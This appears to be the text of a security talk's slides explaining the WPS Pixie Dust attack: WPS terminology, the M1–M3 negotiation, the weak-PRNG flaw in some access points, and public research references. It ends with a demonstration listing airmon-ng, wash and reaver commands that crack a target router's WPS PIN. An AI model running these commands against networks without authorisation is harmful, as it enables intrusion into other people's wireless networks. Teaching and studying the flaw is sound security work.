wps pixie dust attack
TRANSCRIPT
WPS Pixie Dust Attack
Sumit Shrivastava
Myself
Sumit Shrivastava – Security Analyst @ Network Intelligence India Pvt. Ltd.
2.5+ years of work experience in the field of Digital Forensics and Assessment
Certifications
Computer Hacking and Forensics Investigator v8, EC-Council
Certified Professional Forensics Analyst, IIS Mumbai
Certified Professional Hacker NxG, IIS Mumbai
Certified Information Security Consultant, IIS Mumbai
Certified Information Security Expert – Level 1, Innobuzz Knowledge Solutions
Once upon a time Android and Web Developer
Today’s takeaway
Introduction to WPS
Terminology
WPS Pin Formats
WPS Negotiation Process
Types of attacks on WPS
Diving into Pixie Dust
P0wning the WiFi Router - Demonstration
Introduction to WPS
Wi-Fi Protected Setup (WPS, Wi-Fi Simple Config)
Uses PIN Method to secure wireless home network
Created by Wi-Fi Alliance, introduced in 2006
Goal – to allow the home users, who know very little about the wireless security, to add
new devices
Major security flaw revealed in December 2011
Allowed brute-force the WPS Pin
SEVERELY BROKEN PROTOCOL!!!
Terminology
Enrollee: A device seeking to join a WLAN domain
Registrar: An entity with the authority to issue WLAN credentials
External Registrar: A registrar that is separate from the AP
AP: An infrastructure mode 802.11 Access Point
Note:- AP and client device may change roles i.e. AP acts as Enrollee and Client Device acts
Registrar, when WPS is used to configure the access point
WPS Pin
A WPS Pin looks like
This is what your Wi-Fi Router has
at its back label
WPS Pin Format
WPS Negotiation
Process
M1 – 128-bit random nounce
generated by Enrollee
(N1||PKE)
M2 – 128-bit random nounce
generated by Registrar
(N1||N2||PKR||Auth).
Auth = HMAC (M1||M2)
M3 – E-Hash1 (E-
S1||PSK1||PKE||PKR) OR E-
Hash2 (E-
S2||PSK2||PKE||PKR)
Type of Attacks on WPS
Online Brute-force
Offline Brute-force
Physical Attack
Diving into Pixie Dust
What you require?
Hashes -> E-Hash1 and E-Hash2
Public Keys -> PKE, PKR
Authkey
E-Nounce (Enrollee Nounce)
Flaw is in the E-S1 and E-S2 generation which are Psudo-Random Numbers
Dominique Bongard, found many AP use insecure PRNG
Broadlink -> c.rand()
Ralink -> E-S1 and E-S2 are never generated, hence they are always 0
If PRNG state is recovered, E-S1 and E-S2 can be calculated
PSK1 and PSK2 can be calculated from E-Hash1 and E-Hash2
To successfully complete this attack, negotiation should complete within 1 second
P0wning the Wi-Fi router
:~# airmon-ng check kill
:~# airmon-ng start <WIFI_INTERFACE>
:~# wash –i <MONITOR_INTERFACE>
:~# reaver –i <MONITOR_INTERFACE> -b <BSSID> -c <CHANNEL> -vv –K 1
P0wned
References
http://ifconfig.dk/pixiedust/
https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Technical_architecture
http://ftp.netbsd.org/pub/NetBSD/NetBSD-
current/src/external/bsd/wpa/dist/hostapd/README-WPS
http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf
https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
http://www.gta.ufrj.br/ftp/gta/TechReports/wd2012/1569655457.pdf
https://www.wi-
fi.org/download.php?file=/sites/default/files/private/wsc_best_practices_v2_0_1.pdf
Questions?
Thank you